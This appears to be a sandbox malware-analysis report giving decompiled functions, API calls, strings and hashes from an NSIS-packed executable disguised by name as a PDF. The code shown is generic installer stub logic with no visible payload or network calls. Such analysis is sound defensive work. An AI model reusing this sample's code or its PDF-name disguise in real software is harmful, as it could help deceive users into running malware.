                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405BC6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E00405BC6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                      0x00405bc7
                                                                      0x00405bd4
                                                                      0x00405bd5
                                                                      0x00405be0
                                                                      0x00405be8
                                                                      0x00405be8
                                                                      0x00405bf0

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BCC
                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BD6
                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405BE8
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-3355392842
                                                                      • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                      • Instruction ID: 65d0506ad812cb1a76e9921ecf3bea8c464967d5314b17a54056b3388df28152
                                                                      • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                      • Instruction Fuzzy Hash: 41D05E31101535AAC2117B44AC04CDB66AC9E46304342487EF541B60A9C77C696296EE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403969 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00403969() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2b0
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2d4
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039C6();
				return E00405A03(_t11, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\nssE334.tmp", 7);
			}






                                                                      0x00403969
                                                                      0x00403978
                                                                      0x0040397b
                                                                      0x0040397d
                                                                      0x0040397d
                                                                      0x00403984
                                                                      0x0040398c
                                                                      0x0040398f
                                                                      0x00403991
                                                                      0x00403991
                                                                      0x00403991
                                                                      0x00403998
                                                                      0x004039aa

                                                                      APIs
                                                                      • CloseHandle.KERNEL32(000002B0,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040397B
                                                                      • CloseHandle.KERNEL32(000002D4,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040398F
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nssE334.tmp, xrefs: 0040399F
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040396E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nssE334.tmp
                                                                      • API String ID: 2962429428-2799593548
                                                                      • Opcode ID: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
                                                                      • Instruction ID: b4aeda79ce9169ff0691def1b455dd989f45c243b0b2f58971613af12f624ab5
                                                                      • Opcode Fuzzy Hash: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
                                                                      • Instruction Fuzzy Hash: 07E02CB080070492C130AF3CAE4D8853A285F4133A720432BF038F20F0C7788AAB0EA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403D31 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00403D31(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = L"1033";
				_t13 = 0xffff;
				_t6 = E00406172(__ecx, L"1033");
				while(1) {
					_t26 =  *0x42a284;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x42a250 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42a280;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x429220 = _t18[1];
					 *0x42a2e8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42921c = _t23;
						E00406159(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextW( *0x423708, E00406234(_t13, _t24, _t26, 0x429240, 0xfffffffe));
						_t11 =  *0x42a26c;
						_t27 =  *0x42a268;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00406234(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x818;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                      0x00403d35
                                                                      0x00403d3a
                                                                      0x00403d40
                                                                      0x00403d45
                                                                      0x00403d45
                                                                      0x00403d4d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403d55
                                                                      0x00403d5d
                                                                      0x00403d5f
                                                                      0x00403d65
                                                                      0x00403d65
                                                                      0x00403d67
                                                                      0x00403d73
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403d77
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403d79
                                                                      0x00403d7e
                                                                      0x00403d87
                                                                      0x00403d8d
                                                                      0x00403d92
                                                                      0x00403da6
                                                                      0x00403db1
                                                                      0x00403dc9
                                                                      0x00403dcf
                                                                      0x00403dd4
                                                                      0x00403ddc
                                                                      0x00403dfd
                                                                      0x00403dfd
                                                                      0x00403dfd
                                                                      0x00403dde
                                                                      0x00403de0
                                                                      0x00403de0
                                                                      0x00403de4
                                                                      0x00403deb
                                                                      0x00403deb
                                                                      0x00403df0
                                                                      0x00403df6
                                                                      0x00403df6
                                                                      0x00000000
                                                                      0x00403de0
                                                                      0x00403d94
                                                                      0x00403d99
                                                                      0x00403da2
                                                                      0x00403d9b
                                                                      0x00403d9b
                                                                      0x00403d9b
                                                                      0x00403d99

                                                                      APIs
                                                                      • SetWindowTextW.USER32(00000000,00429240), ref: 00403DC9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID: "C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe"$1033
                                                                      • API String ID: 530164218-318252415
                                                                      • Opcode ID: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                                      • Instruction ID: 03976cd0908ed948c9bf00cc325fcd7bd37552fd0e89046400bf063f4d175d83
                                                                      • Opcode Fuzzy Hash: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                                      • Instruction Fuzzy Hash: 5D11D131B44210DBC734AF15DC80A377BADEF85715B2841BFE8016B3A1DB3A9D0386A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405CCE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 53%
                                                                      			E00405CCE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406212(0x425f30, _a4);
				_t21 = E00405C71(0x425f30);
				if(_t21 != 0) {
					E004064A6(_t21);
					if(( *0x42a258 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f30 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f30);
							_push(0x425f30);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406555();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C12(0x425f30);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC6();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                      0x00405cda
                                                                      0x00405ce5
                                                                      0x00405ce9
                                                                      0x00405cf0
                                                                      0x00405cfc
                                                                      0x00405d0c
                                                                      0x00405d0e
                                                                      0x00405d26
                                                                      0x00405d27
                                                                      0x00405d2e
                                                                      0x00405d2f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405d12
                                                                      0x00405d19
                                                                      0x00405d21
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405d19
                                                                      0x00405d31
                                                                      0x00000000
                                                                      0x00405d45
                                                                      0x00405cfe
                                                                      0x00405d04
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405d04
                                                                      0x00405ceb
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                                        • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30,76A63420,?,76A62EE0,00405A23,?,76A63420,76A62EE0,00000000), ref: 00405C7F
                                                                        • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                                        • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,76A63420,?,76A62EE0,00405A23,?,76A63420,76A62EE0,00000000), ref: 00405D27
                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,76A63420,?,76A62EE0,00405A23,?,76A63420,76A62EE0), ref: 00405D37
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: 0_B
                                                                      • API String ID: 3248276644-2128305573
                                                                      • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                                      • Instruction ID: ff48dfae10af5decf38b12d619470e329e8f167eeffaec785d8039fb28d6ac4e
                                                                      • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                                      • Instruction Fuzzy Hash: 6DF04439108F612AE622323A2D08ABF1A14CF8236474A423FF851B12D1CB3C8D43DC6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004052E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 89%
                                                                      			E004052E5(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423714 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423714 = _t16;
							E00404CBB();
						}
						L11:
						return CallWindowProcW( *0x42371c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C3B(_a4, "true");
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404322(0x413);
				return 0;
			}





                                                                      0x004052e9
                                                                      0x004052f3
                                                                      0x0040530f
                                                                      0x00405331
                                                                      0x00405334
                                                                      0x0040533a
                                                                      0x00405344
                                                                      0x00405345
                                                                      0x00405347
                                                                      0x0040534d
                                                                      0x0040534d
                                                                      0x00405357
                                                                      0x00000000
                                                                      0x00405365
                                                                      0x0040531c
                                                                      0x00405354
                                                                      0x00405354
                                                                      0x00000000
                                                                      0x00405354
                                                                      0x00405328
                                                                      0x0040532a
                                                                      0x00000000
                                                                      0x0040532a
                                                                      0x004052f9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405300
                                                                      0x00000000

                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00405314
                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405365
                                                                        • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                                      • Instruction ID: 55ce392e6746b2cc60fd0279fd4fa9b35be9dafe7b92107a95c9794c7a372d77
                                                                      • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                                      • Instruction Fuzzy Hash: 8F01B1B2200708ABEF209F11DD80AAB3725EB80395F545036FE007A1D1C3BA8D929E6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405C12 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 77%
                                                                      			E00405C12(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                                      0x00405c13
                                                                      0x00405c1d
                                                                      0x00405c20
                                                                      0x00405c26
                                                                      0x00405c27
                                                                      0x00405c28
                                                                      0x00405c30
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405c30
                                                                      0x00405c32
                                                                      0x00405c3a

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe,C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe,80000000,00000003), ref: 00405C18
                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe,C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe,80000000,00000003), ref: 00405C28
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-3370423016
                                                                      • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                      • Instruction ID: 7c763ee06e751a121eeaaae5fe0630bfdebb5bec0d299de236eb7caac3423831
                                                                      • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                      • Instruction Fuzzy Hash: BCD05EB2404A249ED322A704ED0499F67A8EF12300786886AE440A6165D7789C8186AD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}





















                                                                      0x100010e6
                                                                      0x100010f0
                                                                      0x100010ff
                                                                      0x1000110e
                                                                      0x10001119
                                                                      0x1000111c
                                                                      0x1000112b
                                                                      0x1000112f
                                                                      0x10001131
                                                                      0x100011d8
                                                                      0x100011de
                                                                      0x10001137
                                                                      0x10001138
                                                                      0x10001138
                                                                      0x1000113d
                                                                      0x1000113e
                                                                      0x10001140
                                                                      0x10001143
                                                                      0x1000120d
                                                                      0x10001210
                                                                      0x100011b0
                                                                      0x100011b6
                                                                      0x100011bf
                                                                      0x100011c4
                                                                      0x100011c7
                                                                      0x00000000
                                                                      0x100011c7
                                                                      0x10001212
                                                                      0x10001214
                                                                      0x10001196
                                                                      0x1000119d
                                                                      0x100011a5
                                                                      0x00000000
                                                                      0x100011a5
                                                                      0x10001161
                                                                      0x10001162
                                                                      0x1000116a
                                                                      0x10001177
                                                                      0x1000117f
                                                                      0x10001188
                                                                      0x1000118d
                                                                      0x1000118d
                                                                      0x00000000
                                                                      0x10001162
                                                                      0x10001149
                                                                      0x100011df
                                                                      0x100011df
                                                                      0x100011e6
                                                                      0x100011f3
                                                                      0x100011f8
                                                                      0x100011fb
                                                                      0x10001203
                                                                      0x10001205
                                                                      0x10001205
                                                                      0x00000000
                                                                      0x100011e6
                                                                      0x1000114f
                                                                      0x10001152
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001158
                                                                      0x1000115b
                                                                      0x100011ac
                                                                      0x00000000
                                                                      0x100011ac
                                                                      0x1000115d
                                                                      0x1000115f
                                                                      0x10001192
                                                                      0x00000000
                                                                      0x10001192
                                                                      0x00000000
                                                                      0x100011c9
                                                                      0x100011c9
                                                                      0x100011d3
                                                                      0x00000000
                                                                      0x100011d7

                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167633537010.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.167633501084.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
